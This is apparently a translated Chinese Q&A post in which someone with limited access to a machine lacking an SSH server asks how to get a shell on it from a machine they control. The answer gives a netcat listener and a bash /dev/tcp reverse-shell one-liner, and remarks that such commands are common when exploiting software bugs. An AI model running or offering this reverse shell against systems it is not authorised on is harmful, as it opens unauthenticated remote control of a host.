我有一台没有 SSHD 的机器，我想从一台远程机器(我可以完全控制)在这台机器上打开一个 bash shell。

因为我在有限的机器上有 SSH，所以我配置了一个反向代理:

$ ssh -R 19999:localhost:22 remoteuser@remotemachine 

现在我在端口 19999 上建立了从“完全控制”机器到“受限”机器的连接。我将如何使用此设置打开 shell？

请您参考如下方法:

您可以将来自某个端口的输入直接传送到 bash。当滥用软件中的各种错误时，这是​​常见的做法。例如，在您的完全访问机器上运行:

nc -lvp 9999 

并且在有限的机器上

/bin/bash -i >& /dev/tcp/192.168.122.1/9999 0>&1 

其中192.168.122.1为全控机IP。

这将在第一台机器中为您提供第二台机器的 shell 。但请注意，连接未加密。如果您想要加密，则需要添加 TCP 转发步骤(与您在上面建议的类似)。